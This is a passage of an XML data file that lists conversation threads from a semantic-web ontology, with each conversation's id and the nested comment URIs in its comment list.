---http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472199
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28476723
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471675
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471569
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471799
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28476157
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471867
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28478477
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471109
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471313
---http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471647
---http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472307
---http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473929
---http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28489637
---http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28478035
---http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28474675
---http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473791
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471233
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472085
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471141
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_06_25_1856214.17</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471163
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471737
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471797
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_06_25_1856214.11</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471089
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_06_25_1856214.30</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471327
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472905
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472357
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473505
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28486099
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473271
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_06_25_1856214.3</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28475595
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_06_25_1856214.36</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470967
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471179
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28482273
</commentlist>
</conversation>
